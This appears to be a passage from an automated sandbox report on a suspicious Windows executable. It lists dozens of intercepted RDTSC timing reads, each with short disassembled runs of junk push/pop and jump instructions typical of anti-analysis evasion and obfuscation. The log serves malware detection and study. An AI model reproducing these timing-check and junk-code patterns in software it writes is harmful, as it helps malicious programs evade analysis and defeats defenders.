Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA67C1 second address: BA67C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA67C5 second address: BA67CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B2E20C second address: B2E210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA567B second address: BA5683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA5683 second address: BA568B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA5BE4 second address: BA5BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA5BE8 second address: BA5BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA5231 second address: BA523F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA523F second address: BA5253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F30h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA6035 second address: BA604A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E9719Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA604A second address: BA6051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA6051 second address: BA606D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA3F4E971A2h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA61D6 second address: BA61F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA3F4513F2Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA61F3 second address: BA61F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA61F7 second address: BA61FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA61FD second address: BA6203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA64DA second address: BA64E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA64E2 second address: BA651F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A1h 0x00000007 pushad 0x00000008 ja 00007FA3F4E97196h 0x0000000e push edx 0x0000000f pop edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jc 00007FA3F4E971AFh 0x0000001c jmp 00007FA3F4E971A3h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA651F second address: BA6559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4513F35h 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FA3F4513F26h 0x00000011 jmp 00007FA3F4513F39h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BB0254 second address: BB026B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B2794F second address: B27953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B27953 second address: B27967 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FA3F4E971A2h 0x0000000c js 00007FA3F4E97196h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAECA0 second address: BAECA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAECA4 second address: BAECAE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAEDD8 second address: BAEDDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAF0DA second address: BAF0E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FA3F4E97196h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAF0E6 second address: BAF0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAFB1B second address: BAFB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAFB1F second address: BAFB25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAFB25 second address: BAFB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BB33F7 second address: BB33FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BB33FC second address: BB3407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BB3545 second address: BB3550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA3F4513F26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BB3550 second address: BB3580 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jc 00007FA3F4E97196h 0x0000000b popad 0x0000000c jmp 00007FA3F4E971A2h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA3F4E9719Dh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBB95C second address: BBB97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA3F4513F2Fh 0x0000000c jc 00007FA3F4513F2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBAD0C second address: BBAD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBAD10 second address: BBAD16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBAD16 second address: BBAD33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FA3F4E97196h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 pushad 0x00000017 popad 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBAD33 second address: BBAD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBAD37 second address: BBAD3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBAE60 second address: BBAE83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FA3F4513F3Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBB572 second address: BBB593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA3F4E971A9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBE2BF second address: BBE2DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F38h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBE7A8 second address: BBE7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBE7AC second address: BBE7B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC326F second address: BC3277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC3277 second address: BC327B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC327B second address: BC329E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E9719Dh 0x00000007 jmp 00007FA3F4E9719Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B690F7 second address: B69104 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69104 second address: B69108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69108 second address: B69111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69111 second address: B69175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 sub edx, dword ptr [ebp+122D2B00h] 0x0000000d mov ebx, dword ptr [ebp+1247F0EEh] 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FA3F4E97198h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d jmp 00007FA3F4E971A6h 0x00000032 add eax, ebx 0x00000034 mov dx, bx 0x00000037 push eax 0x00000038 jl 00007FA3F4E971B9h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FA3F4E9719Dh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC3924 second address: BC392A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC392A second address: BC3934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC3934 second address: BC394D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4513F35h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC394D second address: BC3951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC3951 second address: BC3996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FA3F4513F30h 0x0000000d jmp 00007FA3F4513F39h 0x00000012 jnl 00007FA3F4513F26h 0x00000018 popad 0x00000019 pushad 0x0000001a jne 00007FA3F4513F26h 0x00000020 push esi 0x00000021 pop esi 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCA9B2 second address: BCA9B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCA9B8 second address: BCA9BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCACC0 second address: BCACD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E9719Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCB5A9 second address: BCB5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FA3F4513F2Fh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCB5BF second address: BCB5C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCB5C5 second address: BCB5C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCBB2A second address: BCBB2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCBB2E second address: BCBB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCBB34 second address: BCBB3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCBB3A second address: BCBB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCBB3E second address: BCBB42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCBB42 second address: BCBB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FA3F4513F32h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD5F24 second address: BD5F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4E971A2h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jmp 00007FA3F4E9719Eh 0x00000011 jmp 00007FA3F4E971A1h 0x00000016 popad 0x00000017 push ecx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD5F63 second address: BD5F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD5F69 second address: BD5F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA3F4E971A4h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD52AA second address: BD52B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD52B0 second address: BD52C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007FA3F4E97196h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD52C0 second address: BD52C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD52C4 second address: BD52DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 je 00007FA3F4E97198h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 jnp 00007FA3F4E97196h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD52DD second address: BD52E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD5877 second address: BD587D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD5B6C second address: BD5B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD5CA1 second address: BD5CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B20DE4 second address: B20DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B20DE9 second address: B20DFD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA3F4E9719Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B20DFD second address: B20E13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B20E13 second address: B20E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDD271 second address: BDD275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDD275 second address: BDD279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDD6E3 second address: BDD6E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDD877 second address: BDD87C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDD9E4 second address: BDDA3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FA3F4513F36h 0x00000011 jmp 00007FA3F4513F38h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d pop eax 0x0000001e js 00007FA3F4513F26h 0x00000024 jnl 00007FA3F4513F26h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDDB80 second address: BDDB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDDB84 second address: BDDBA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007FA3F4513F35h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDDBA7 second address: BDDBC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA3F4E971A3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDE7EE second address: BDE80E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4513F2Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA3F4513F2Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDCE52 second address: BDCE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF0BCB second address: BF0BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF0BD1 second address: BF0BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF0BD5 second address: BF0BFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F38h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jng 00007FA3F4513F26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF07DA second address: BF07DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
